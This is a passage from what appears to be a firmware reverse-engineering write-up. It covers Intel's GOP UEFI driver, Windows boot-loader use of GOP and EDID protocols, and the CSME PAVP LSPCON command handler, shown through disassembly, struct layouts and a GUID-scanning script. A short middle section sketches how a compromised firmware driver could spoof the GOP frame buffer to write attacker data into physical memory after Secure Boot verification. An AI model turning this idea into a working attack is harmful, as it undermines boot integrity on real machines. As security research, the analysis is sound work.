.text:00000000000002E0                                         ; DATA XREF: GopEntryPoint+169↓o
.text:00000000000002E0                 dw 9562h                ; Data2
.text:00000000000002E0                 dw 11D2h                ; Data3
.text:00000000000002E0                 db 8Eh, 3Fh, 0, 0A0h, 0C9h, 69h, 72h, 3Bh; Data4
.text:00000000000002F0 EFI_DRIVER_BINDING_PROTOCOL_GUID dd 18A031ABh            ; Data1
.text:00000000000002F0                                         ; DATA XREF: UnloadImage+BB↓o
.text:00000000000002F0                                         ; GopEntryPoint+1D2↓o
.text:00000000000002F0                 dw 0B443h               ; Data2
.text:00000000000002F0                 dw 4D1Ah                ; Data3
.text:00000000000002F0                 db 0A5h, 0C0h, 0Ch, 9, 26h, 1Eh, 9Fh, 71h; Data4
.text:0000000000000300 EFI_COMPONENT_NAME2_PROTOCOL_GUID dd 6A7A5CFFh            ; Data1
.text:0000000000000300                                         ; DATA XREF: UnloadImage+A1↓o
.text:0000000000000300                                         ; GopEntryPoint+1B8↓o
.text:0000000000000300                 dw 0E8D9h               ; Data2
.text:0000000000000300                 dw 4F70h                ; Data3
.text:0000000000000300                 db 0BAh, 0DAh, 75h, 0ABh, 30h, 25h, 0CEh, 14h; Data4

A few couldn't be identified. Another "fast forward" trick I can use is to find all locations protocols are installed or requested. If we look at how protocols are installed using gBOOT_SERVICES::InstallMultipleProtocolInterfaces:

.text:0000000000002938 FF 90 48 01 00 00                 call    qword ptr dword_148[rax]

We see the offset is pretty large, 0x148. We can just search for the wildcard "call qword ptr dword_148[reg]" and see if reg contains the global gBOOT_SERVICES. This way we can jump directly to the functions and identify what they do and name them:

Address	Function	Instruction
.text:000000000000188B	GopEntryPoint	                    FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:00000000000018C3	GopEntryPoint	                    FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:00000000000018E8	GopEntryPoint	                    FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:0000000000001ECC	EnumConnectionsAndInstallEdidProto	FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:0000000000001F50	EnumConnectionsAndInstallEdidProto	FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:0000000000001FFA	InstallBrightnessProto	            FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:0000000000002036	InstallBrightnessProto              FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:000000000000221F	InstallGraphicsProto	            FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:00000000000022A0	InstallGraphicsProto             	FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:0000000000002938	DriverBindingProtoStartImp        	FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]

This also gets as all the function tables for these protocols, and helps us understand the global state struct for the driver. Unlike C++, the UEFI function receive a This pointer that contains both data members and function pointers, for example for the GOP protocol:

...
typedef EFI_STATUS (EFIAPI *EFI_GRAPHICS_OUTPUT_PROTOCOL_BLT) (
    IN EFI_GRAPHICS_OUTPUT_PROTOCOL *This,
    IN EFI_GRAPHICS_OUTPUT_BLT_PIXEL *BltBuffer OPTIONAL,
    IN EFI_GRAPHICS_OUTPUT_BLT_OPERATION BltOperation,
    IN UINTN SourceX, IN UINTN SourceY,
    IN UINTN DestinationX, IN UINTN DestinationY,
    IN UINTN Width, IN UINTN Height,
    IN UINTN Delta OPTIONAL
);

typedef struct {
    UINT32 MaxMode;
    UINT32 Mode;
    EFI_GRAPHICS_OUTPUT_MODE_INFORMATION *Info;
    UINTN SizeOfInfo;
    EFI_PHYSICAL_ADDRESS FrameBufferBase;
    UINTN FrameBufferSize;
} EFI_GRAPHICS_OUTPUT_PROTOCOL_MODE;

struct _EFI_GRAPHICS_OUTPUT_PROTOCOL {
    EFI_GRAPHICS_OUTPUT_PROTOCOL_QUERY_MODE QueryMode;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_SET_MODE SetMode;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_BLT Blt;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_MODE *Mode;
};

So the protocol structure has to be stored in some state structure. If the state structure is a singleton it can be stored as a global, but if we want multiple copies the driver allocates a state structure, places the protocol structure in a known offset within, and then can calculate the start of the structure from the This pointer provided to the protocol functions. We can use this information to try to piece together this global structre:

00000000 DriverState     struc ; (sizeof=0xE8, mappedto_92)
00000000                                         ; XREF: .text:gDriverState/r
00000000 language        dq ?                    ; offset
00000008 ImgHandle       dq ?                    ; XREF: GopEntryPoint+A9/w
00000010 field_10        dd ?
00000014 field_14        dd ?
00000018 graphics_proto  dq ?
00000020 field_20        dq ?                    ; XREF: GetDriverVersion+16/o
00000028 DriverVersion   dq ?                    ; XREF: GopEntryPoint+125/w
00000030 field_30        dq ?
00000038 active_proto_copy dq ?
00000040 field_40        dq ?                    ; XREF: GetControllerName+99/o
00000048 ControllerName  dq ?                    ; XREF: GopEntryPoint+11E/w
00000050 field_50        dq ?
00000058 field_58        dq ?
00000060 brightness_proto dq ?                   ; XREF: UnloadImage+8E/o
00000060                                         ; GopEntryPoint+1EE/o
00000068 name_proto      dq ?
00000070 bist_proto_orig GOP_DISPLAY_BIST_PROTOCOL_FUNC_TABLE ?
00000070                                         ; XREF: InstallBrightnessProto+50/o
00000080 bist_proto      GOP_DISPLAY_BIST_PROTOCOL ?
00000080                                         ; XREF: sub_44D8+21/o
00000080                                         ; sub_44D8+28/w ...
00000094 field_94        dd ?
00000098 field_98        dq ?                    ; XREF: sub_4900+24/o
00000098                                         ; sub_4900+2F/w ...
000000A0 field_A0        dq ?                    ; XREF: sub_4900+36/w
000000A0                                         ; sub_4900+319/r ...
000000A8 field_A8        dq ?                    ; XREF: sub_245C+14/r
000000A8                                         ; sub_245C+1B/o ...
000000B0 field_B0        dq ?                    ; XREF: sub_245C+86/r
000000B0                                         ; sub_259C+6C/r ...
000000B8 field_B8        dq ?                    ; XREF: sub_35A4+37A/o
000000B8                                         ; sub_35A4+384/w ...
000000C0 field_C0        dq ?                    ; XREF: sub_35A4+38B/w
000000C0                                         ; sub_35A4+3EF/r ...
000000C8 field_C8        dq ?
000000D0 field_D0        dq ?                    ; XREF: sub_35A4+420/o
000000D8 field_D8        dq ?
000000E0 field_E0        dq ?
000000E8 DriverState     ends

and so on.

It won't be too interesting to just dump more and more dissassembled functions here, as our goal is to find possible access to GuC. None of the functions I identified had any connection to the GuC, so next I looked at all accesses to PCI devices, as GuC accesses should be made using PCI. The devices are identified using EFI_DEVICE_PATH_PROTOCOL and accessed through EFI_PCI_IO_PROTOCOL_GUID.

DriverBindingProtoSupported+CB lea rdx, EFI_PCI_IO_PROTOCOL_GUID
DriverBindingProtoSupported+173 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
EnumConnectionsAndInstallEdidProto+259 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
sub_245C+9C lea r8, EFI_PCI_IO_PROTOCOL_GUID
sub_259C+33 lea r8, EFI_PCI_IO_PROTOCOL_GUID
sub_259C+81 lea r8, EFI_PCI_IO_PROTOCOL_GUID
DriverBindingProtoStartImp+44 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
DriverBindingProtoStartImp+20C lea rdx, EFI_PCI_IO_PROTOCOL_GUID
uninstall?+76 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
uninstall?+220 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
DriverBindingProtoStop+DD lea rdx, EFI_PCI_IO_PROTOCOL_GUID
DriverBindingProtoStop+120 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
sub_2EC0+158 lea r8, EFI_PCI_IO_PROTOCOL_GUID
GetControllerName+3A lea rdx, EFI_PCI_IO_PROTOCOL_GUID
GetControllerName+59 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
GetControllerName:loc_55C6 lea r8, EFI_PCI_IO_PROTOCOL_GUID

Some places are spurios, like:

.text:00000000000024F8                 lea     r8, EFI_PCI_IO_PROTOCOL_GUID
.text:00000000000024FF                 mov     rcx, rsi
.text:0000000000002502                 call    sub_5F04

Since sub_5F04 overrides r8 immediatly:

.text:0000000000005F04 sub_5F04        proc near               ; CODE XREF: sub_245C+A6↑p
.text:0000000000005F04                                         ; sub_259C+41↑p ...
.text:0000000000005F04
.text:0000000000005F04 count           = qword ptr -18h
.text:0000000000005F04 arg_0           = qword ptr  8
.text:0000000000005F04 proto_info      = qword ptr  20h
.text:0000000000005F04
.text:0000000000005F04                 mov     [rsp+arg_0], rbx
.text:0000000000005F09                 push    rdi
.text:0000000000005F0A                 sub     rsp, 30h
.text:0000000000005F0E                 mov     rax, cs:gBOOT_SERVICES
.text:0000000000005F15                 mov     rdi, rdx
.text:0000000000005F18                 lea     r9, [rsp+38h+count]
.text:0000000000005F1D                 lea     r8, [rsp+38h+proto_info]      ;; HERE!!

Long story short: no code in the GOP DXE driver communicates with the GuC.

Before moving on to CSME vs GuC, I was curious who exactly uses all these protocols, in the rest of the UEFI BIOS and Windows. I extracted the UEFI capsule and also mounted the Windows ISO and WIM files (dism /mount-image /imagefile:e:\sources\install.wim /index:1 /mountdir:c:\mnt\install /readonly), and then ran the following python script:

from struct import unpack
from os import walk
from mmap import mmap, ACCESS_READ
import os.path as path

GUIDS = (
((0xDE, 0xA9, 0x42, 0x90, 0xDC, 0x23, 0x38, 0x4A, 0x96, 0xFB, 0x7A, 0xDE, 0xD0, 0x80, 0x51, 0x6A), 'EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID'),
((0x56, 0x10, 0x8C, 0xBD, 0x36, 0x9F, 0xEC, 0x44, 0x92, 0xA8, 0xA6, 0x33, 0x7F, 0x81, 0x79, 0x86), 'EFI_EDID_ACTIVE_PROTOCOL_GUID'),
((0xF6, 0x34, 0x0C, 0x1C, 0x80, 0xD3, 0xFA, 0x41, 0xA0, 0x49, 0x8A, 0xD0, 0x6C, 0x1A, 0x66, 0xAA), 'EFI_EDID_DISCOVERED_PROTOCOL_GUID'),
((0x1D, 0x3F, 0xF2, 0x6F, 0x7C, 0x87, 0x1B, 0x4B, 0x93, 0xFC, 0xF1, 0x42, 0xB2, 0xEE, 0xA6, 0xA7), 'GOP_DISPLAY_BRIGHTNESS_PROTOCOL_GUID'),
((0x3A, 0xD3, 0x1D, 0xF5, 0x7F, 0xE5, 0x20, 0x40, 0xB4, 0x66, 0xF4, 0xC1, 0x71, 0xC6, 0xE4, 0xF7), 'GOP_DISPLAY_BIST_PROTOCOL_GUID'),
#((0x00, 0xB2, 0xF5, 0x4C, 0xB8, 0x68, 0xA5, 0x4C, 0x9E, 0xEC, 0xB2, 0x3E, 0x3F, 0x50, 0x02, 0x9A), 'EFI_PCI_IO_PROTOCOL_GUID'),
#((0xBD, 0x7E, 0x1B, 0x65, 0x13, 0xCE, 0xD0, 0x41, 0x82, 0xE5, 0xA0, 0x63, 0xAB, 0xBE, 0x9B, 0xB6), 'GOP_COMPONENT_NAME2_PROTOCOL_GUID'),
((0xCD, 0x2F, 0xCB, 0xDB, 0x9A, 0xE2, 0x0E, 0x41, 0x9D, 0xD9, 0xFA, 0x9D, 0x5F, 0xF4, 0xCD, 0xA7), 'UNKNOWN_PROTOCOL_GUID'),
((0x3B, 0x70, 0xD4, 0xC7, 0x36, 0x0F, 0x51, 0x4E, 0xA9, 0x83, 0x5E, 0x61, 0xAC, 0xB8, 0x68, 0x3C), 'MAYBE_AUX_PROTOCOL_GUID?'),
#((0x91, 0x6E, 0x57, 0x09, 0x3F, 0x6D, 0xD2, 0x11, 0x8E, 0x39, 0x00, 0xA0, 0xC9, 0x69, 0x72, 0x3B), 'EFI_DEVICE_PATH_PROTOCOL_GUID'),
#((0xA1, 0x31, 0x1B, 0x5B, 0x62, 0x95, 0xD2, 0x11, 0x8E, 0x3F, 0x00, 0xA0, 0xC9, 0x69, 0x72, 0x3B), 'EFI_LOADED_IMAGE_PROTOCOL_GUID'),
#((0xAB, 0x31, 0xA0, 0x18, 0x43, 0xB4, 0x1A, 0x4D, 0xA5, 0xC0, 0x0C, 0x09, 0x26, 0x1E, 0x9F, 0x71), 'EFI_DRIVER_BINDING_PROTOCOL_GUID'),
#((0xFF, 0x5C, 0x7A, 0x6A, 0xD9, 0xE8, 0x70, 0x4F, 0xBA, 0xDA, 0x75, 0xAB, 0x30, 0x25, 0xCE, 0x14), 'EFI_COMPONENT_NAME2_PROTOCOL_GUID')
)

guids = { bytes(k) : v for k, v in GUIDS }
first_dwords = set([unpack("<I", guid[0:4]) for guid in guids.keys()])

for root in ('c:\\mnt\\iso', 'c:\\mnt\\boot', 'c:\\mnt\\install', 'c:\\mnt\\uefi'):
    for dir, _, files in walk(root):
        for file in files:
            filename = dir + '\\' + file
            try:
                filelen = path.getsize(filename) & ~15
                if filelen == 0:
                    continue
                with open(filename, 'rb') as file:
                    with mmap(file.fileno(), filelen, access=ACCESS_READ) as mem:
                        for ofs in range(0, filelen, 16):
                            if unpack("<I", mem[ofs:ofs+4]) in first_dwords:
                                guid = mem[ofs:ofs+16]
                                try:
                                    name = guids[guid]
                                    print(f'{filename}\t{ofs:x}\t{name}')
                                except KeyError:
                                    pass
            except PermissionError:
                pass

The UEFI setup and legacy components use the GOP and the EDID components:

c:\mnt\uefi\\AMITSE.efi	400	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\Bds.efi	3d0	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\ConSplitter.efi	310	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\CsmVideo.efi	2c0	EFI_EDID_DISCOVERED_PROTOCOL_GUID
c:\mnt\uefi\\CsmVideo.efi	2d0	EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\uefi\\CsmVideo.efi	320	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\GraphicsConsole.efi	2b0	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\Setup.efi	2e0	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\UefiPxeBcDxe.efi	490	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID

In Windows we have only:

c:\mnt\boot\Windows\Boot\EFI\bootmgfw.efi       a1a0    EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\boot\Windows\Boot\EFI\bootmgfw.efi       a220    EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\winload.efi        17e210  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\winload.efi        17e2a0  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\winresume.efi      122c00  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\winresume.efi      122c80  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\Boot\winload.efi   17e210  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\Boot\winload.efi   17e2a0  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\Boot\winresume.efi 122bf0  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\Boot\winresume.efi 122c70  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\Boot\EFI\bootmgfw.efi    a1a0    EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\Boot\EFI\bootmgfw.efi    a220    EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\System32\SecConfig.efi   110b80  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\System32\SecConfig.efi   110c00  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\System32\winload.efi     17e210  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\System32\winload.efi     17e2a0  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\System32\winresume.efi   122c00  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\System32\winresume.efi   122c80  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\System32\Boot\winload.efi        17e210  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\System32\Boot\winload.efi        17e2a0  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\System32\Boot\winresume.efi      122bf0  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\System32\Boot\winresume.efi      122c70  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\iso\bootx64.efi a1a0    EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\iso\bootx64.efi a220    EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID

So basically most of the GOP DXE driver functions go unused and can be considered bloat …

Are EFI_GRAPHICS_OUTPUT_PROTOCOL and EFI_EDID_ACTIVE_PROTOCOL_GUID possible vectors for exploitation from UEFI -> Windows? Assume for example a DXE driver has a bug that can be exploited using specialized hardware, and you gain execution in the UEFI firmware during boot. Can these protocols be used as an attack surface to attack SecureBoot Windows?

As seen before, EFI_GRAPHICS_OUTPUT_PROTOCOL has a driver controlled Mode member

struct _EFI_GRAPHICS_OUTPUT_PROTOCOL {
    EFI_GRAPHICS_OUTPUT_PROTOCOL_QUERY_MODE QueryMode;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_SET_MODE SetMode;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_BLT Blt;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_MODE *Mode;
};

In turn EFI_GRAPHICS_OUTPUT_PROTOCOL_MODE is defined as:

typedef struct {
    UINT32 MaxMode;
    UINT32 Mode;
    EFI_GRAPHICS_OUTPUT_MODE_INFORMATION *Info;
    UINTN SizeOfInfo;
    EFI_PHYSICAL_ADDRESS FrameBufferBase;
    UINTN FrameBufferSize;
} EFI_GRAPHICS_OUTPUT_PROTOCOL_MODE;

These structure are used in several functions inside the console library shared by all the relevant Windows components. The two main functions are ConsoleEfiGopOpen and ConsoleEfiGopEnable:

__int64 __fastcall ConsoleEfiGopOpen(CONSOLE_DATA *this)
{
  ...
  if ( EfiOpenProtocol(this->efi_handle, (__int64)&EfiGraphicsOutputProtocol, &gop_protocol) >= 0 )
  {
    status = EfiGopGetCurrentMode(gop_protocol, &mode, &mode_info);
    if ( status >= 0 )
    {
      orig_mode = mode;
      new_mode = mode;
      
      ... check if mode is allowed, if not get allowed mode ...
      
      // fill state with mode data
      is_rgb = mode_info.PixelFormat == PixelBlueGreenRedReserved8BitPerColor;
      this_1->gop_protocol = gop_protocol;
      this_1->new_mode = new_mode;
      this_1->orig_mode = orig_mode;
      if ( is_rgb )
        bits_per_pixel = 32;
      else if ( mode_info.PixelFormat == PixelBitMask )
        bits_per_pixel = 24;      
      else {
        status = STATUS_UNSUCCESSFUL;
        goto exit_handler;
      }
      this_1->orig_horiz_res = mode_info.HorizontalResolution;
      this_1->orig_vert_res = mode_info.VerticalResolution;
      pixels_per_scan_line = mode_info.PixelsPerScanLine;
      this_1->orig_bits_per_pixel = bits_per_pixel;
      result = 0i64;
      this_1->orig_pixels_per_scan_line = pixels_per_scan_line;
      return result;
      
    }
exit_handler:
    EfiCloseProtocol(this_1->efi_handle, &EfiGraphicsOutputProtocol);
    return (unsigned int)status;
  }
  return 0xC00000BB;
}

EfiGopGetCurrentMode() in turn uses MmArchTranslateVirtualAddress to get physical addresses for the output:

int __fastcall EfiGopGetCurrentMode(EFI_GRAPHICS_OUTPUT_PROTOCOL *gop, unsigned int *mode, EFI_GRAPHICS_OUTPUT_MODE_INFORMATION *info)
{
  ...
  info_phys_addr = info;
  mode_phys_addr = mode;
  gop_phys_addr = gop;
  context_mode = *gCurrentExecutionContext;
  if ( *gCurrentExecutionContext != ExecutionContextFirmware )
  {
    if ( gop )
      status = MmArchTranslateVirtualAddress(gop, (unsigned __int64 *)&phys_addr, 0i64, 0i64);
    else
      status = 0;
    if ( !status )
      return STATUS_UNSUCCESSFUL;
    gop_phys_addr = phys_addr;
    is_mapped = mode_phys_addr ? MmArchTranslateVirtualAddress(
                                   mode_phys_addr,
                                   (unsigned __int64 *)&phys_addr,
                                   0i64,
                                   0i64) : 0;
    if ( !is_mapped )
      return STATUS_UNSUCCESSFUL;
    mode_phys_addr = (unsigned int *)phys_addr;
    is_mapped_2 = info_phys_addr ? MmArchTranslateVirtualAddress(
                                     info_phys_addr,
                                     (unsigned __int64 *)&phys_addr,
                                     0i64,
                                     0i64) : 0;
    if ( !is_mapped_2 )
      return STATUS_UNSUCCESSFUL;
    info_phys_addr = (EFI_GRAPHICS_OUTPUT_MODE_INFORMATION *)phys_addr;
    BlpArchSwitchContext(ExecutionContextFirmware);
  }
  *mode_phys_addr = gop_phys_addr->Mode->Mode;
  mode_info = gop_phys_addr->Mode->Info;
  *(_OWORD *)&info_phys_addr->Version = *(_OWORD *)&mode_info->Version;
  info_phys_addr->PixelInformation = mode_info->PixelInformation;
  info_phys_addr->PixelsPerScanLine = mode_info->PixelsPerScanLine;
  if ( context_mode != ExecutionContextFirmware )
    BlpArchSwitchContext(context_mode);
  return v3;
}

The most we can get from this is an arbitary read from physical memory by Windows.

Lets look at ConsoleEfiGopEnable:

unsigned int __fastcall ConsoleEfiGopEnable(CONSOLE_DATA *this)
{
  ...
  status = EfiGopGetCurrentMode(this->gop_protocol, &old_mode, &mode_info);
  if ( status < 0 )
    return status;
  new_mode_1 = old_mode;
  if ( old_mode != new_mode )
  {  
    status = EfiGopSetMode(this_1->gop_protocol, new_mode);
    if ( status >= 0 )
    {
      BlDisplayInvalidateOemBitmap();
      EfiGopGetCurrentMode(this_1->gop_protocol, &mode, &mode_info);
      new_mode_1 = old_mode;
    }
  }
  
    if ( mode_info.PixelFormat == PixelBlueGreenRedReserved8BitPerColor )
        bits_per_pixel = 32;
    else if ( mode_info.PixelFormat == PixelBitMask )
        bits_per_pixel = 24;
    else { ...; return STATUS_UNSUCCESSFUL; }
    
    EfiGopGetFrameBuffer(this_1->gop_protocol, &frame_buffer_base, &frame_buffer_size);
    if ( BlMmMapPhysicalAddressEx(&frame_buffer, frame_buffer_base, frame_buffer_size, 8u, 0) >= 0
      || (status = BlMmMapPhysicalAddressEx(&frame_buffer, frame_buffer_base, frame_buffer_size, 1u, 0), status >= 0) )
    {
      this_1->frame_buffer = (void *)frame_buffer_1;
      this_1->frame_buffer_size = frame_buffer_size;
      this_1->bits_per_pixel = bits_per_pixel;
      this_1->horiz_res = mode_info.HorizontalResolution;
      ... contonue filling this_1 with mode_info ...
      return result;
    }
  }
  return STATUS_UNSUCCESSFUL;

Here Windows map the physical address supplied by GOP->FrameBuffer (retrieved in EfiGopGetFrameBuffer) into Windows. We can control FrameBuffer so we might be able to arbitarily map any physical memory as the frame buffer.

How does that help us? If for example the OEM logo (specified in the 'BGRT' ACPI table) is copied to the FrameBuffer, we can write data under our control to a physical address under our control - after the bootmgr has already been verified as part of the Secure Boot process.

But this is tangental to this post so we’ll examine this vector in a future post.

Part 2: From CSME

Now lets turn to the question wether CSME accesses the GuC and vice-versa.

The CSME is really big, so an exhastive disassembly like we did for the GOP is less relevant. So where might the CSME engine need to communicate with the GuC?

One place that comes into mind is the PAVP - Protected Audio Video Path. This is the component that protects protected HD content from being copied. The protection is implemented by creating a secure pipeline from the media components in the Windows kernel, through the GFX driver, and all the way to the display. The CSME is used to protect the pipeline including certs, keys and much more.

We can start with the CSME HECI (Host Embedded Controller Interface) driver on Windows and find the relevant HECI messages. One group of interesting messages I found was for the LSPCON component. LSPCON stands for Level Shifter and Protocol Converter, which is used for HDR signalling over HDMI.

No hard work means no fish, so we go on a fishing expedition and finally manage to extract the PAVP component from an old CSME15 build. Its about 300KB in size, so still quite big.

Reversing this I went down a deep rabbit hole. I finally discovered a function I named PAVP_init_heci, that is called from main and initializes the HECI communication module in PAVP and registers an interface with three functions:

  • handle async messages - PAVP_handle_async_message
  • HECI connection request - PAVP_connect
  • HECI disconnect request - PAVP_disconnect (all the names are mine)

PAVP_heci_handle_async_message() handles different types of messages like widevine, asmf, PlayReady and so on. We are interested in CPHS - Intel Content Protection HECI Service, a function I named PAVP_process_cphs_message(). Digging deeper we eventually reach the LSPCON command handler:

.text:0010775B ; int __cdecl LSPCON_command_handler(PavpCtx *ctx, void *heci_msg, int heci_msg_len, int max_out_len, int *out_len)
.text:0010775B LSPCON_command_handler proc near        ; CODE XREF: PAVP_heci_command_handler+8D↑p
.text:0010775B
.text:0010775B var_14          = dword ptr -14h
.text:0010775B msg_len         = dword ptr -10h
.text:0010775B ctx             = dword ptr  8
.text:0010775B heci_msg        = dword ptr  0Ch
.text:0010775B heci_msg_len    = dword ptr  10h
.text:0010775B max_out_len     = dword ptr  14h
.text:0010775B out_len         = dword ptr  18h
.text:0010775B
.text:0010775B cmd = ebx
.text:0010775B                 push    ebp
.text:0010775C                 mov     ebp, esp
.text:0010775E                 push    edi
.text:0010775F                 push    esi
.text:00107760                 push    cmd
.text:00107761                 sub     esp, 8
.text:00107764                 mov     eax, [ebp+heci_msg_len]
.text:00107767                 mov     ecx, [ebp+ctx]
.text:0010776A                 mov     [ebp+msg_len], eax
.text:0010776D                 mov     eax, [ebp+max_out_len]
.text:00107770                 mov     cmd, [ebp+heci_msg]
.text:00107773                 mov     [ebp+var_14], eax
.text:00107776                 mov     esi, [ebp+out_len]
.text:00107779                 test    ecx, ecx
.text:0010777B                 jz      short err_cmd_not_in_range
.text:0010777D                 cmp     [ecx+PavpCtx.Lspcon], 0
.text:00107781                 jz      short err_cmd_not_in_range
.text:00107783                 test    cmd, cmd
.text:00107785                 setz    dl
.text:00107788                 test    esi, esi
.text:0010778A                 setz    al
.text:0010778D                 or      dl, al
.text:0010778F                 jnz     short err_cmd_not_in_range
.text:00107791                 cmp     [ebp+msg_len], 0Fh ; cmd_len <= sizeof(LSPCON_heci_command_header_t)
.text:00107795                 ja      short is_cmd_id_in_heci_range

It begins by verifying the command buffer is big enough to fit the LSPCON HECI command header:

00000000 LSPCON_heci_command_header_t struc ; (sizeof=0x10, mappedto_125)
00000000                                         ; XREF: LSPCON_HECICMD_PLAYBACK_DONE_IN/r
00000000                                         ; LSPCON_HECICMD_PLAYBACK_DONE_OUT/r ...
00000000 version         dd ?
00000004 cmdid           dd ?                    ; XREF: LSPCON_command_handler:is_cmd_id_in_heci_range/r
00000008 status          dd ?
0000000C size            dd ?                    ; XREF: LSPCON_command_handler+6B/w
0000000C                                         ; LSPCON_command_handler+91/w ...
00000010 LSPCON_heci_command_header_t ends

Next it checks the command is one of the 7 LSPCON HECI commands and retreives appropriate handler from a global handler list:

.text:001077B8 is_cmd_id_in_heci_range:                ; CODE XREF: LSPCON_command_handler+3A↑j
.text:001077B8                 mov     edi, [cmd+LSPCON_heci_command_header_t.cmdid]
.text:001077BB                 lea     eax, [edi-0E000h] ; is 0xE000 < id < 0xE008
.text:001077C1                 cmp     eax, 7
.text:001077C4                 jbe     short get_handler
                               ...
.text:001077D4 get_handler:                            ; CODE XREF: LSPCON_command_handler+69↑j
.text:001077D4                 mov     edx, dword ptr ds:gLSPCONCmdHandlerTable[eax*8] ; gLSPCONCmdHandlerTable.HandleFunc
.text:001077DB                 test    edx, edx        ; EDX contains handler
.text:001077DD                 jnz     short check_cmd_data

The global list looks something like:

gLSPCONCmdHandlerTable[] = {
      { 0 },
      { LSPCON_get_status,             sizeof(LSPCON_HECICMD_GET_LSPCON_STATUS_IN),    sizeof(LSPCON_HECICMD_GET_LSPCON_STATUS_OUT)},
      { LSPCON_set_dev_cert,           sizeof(LSPCON_HECICMD_SET_LSPCON_CERT_IN),      sizeof(LSPCON_HECICMD_SET_LSPCON_CERT_OUT)},
      { LSPCON_init_session,           sizeof(LSPCON_HECICMD_INIT_SESSION_IN),         sizeof(LSPCON_HECICMD_INIT_SESSION_OUT)},
      { LSPCON_init_limits,            sizeof(LSPCON_HECICMD_INIT_LIMITS_IN),          sizeof(LSPCON_HECICMD_INIT_LIMITS_OUT)},
      { LSPCON_playback_done,          sizeof(LSPCON_HECICMD_PLAYBACK_DONE_IN),        sizeof(LSPCON_HECICMD_PLAYBACK_DONE_OUT)},
      { LSPCON_ack,                    sizeof(LSPCON_HECICMD_MSG_ACK_IN),              sizeof(LSPCON_HECICMD_MSG_ACK_OUT)},
      { LSPCON_get_topology,           sizeof(LSPCON_HECICMD_GET_TOPOLOGY_IN),         sizeof(LSPCON_HECICMD_GET_TOPOLOGY_OUT)},
  };

After verifying the size of the input and output structs the actual command handle is called.

.text:001077FD
.text:001077FD check_cmd_data:                         ; CODE XREF: LSPCON_command_handler+82↑j
.text:001077FD                 movzx   edi, word ptr ds:unk_82364[eax*8] ; gLSPCONCmdHandlerTable.InputSize
.text:00107805                 cmp     edi, [ebp+msg_len]
.text:00107808                 ja      short sizes_error
.text:0010780A                 movzx   eax, word ptr ds:unk_82366[eax*8] ; gLSPCONCmdHandlerTable.OutputSize
.text:00107812                 cmp     eax, [ebp+var_14]
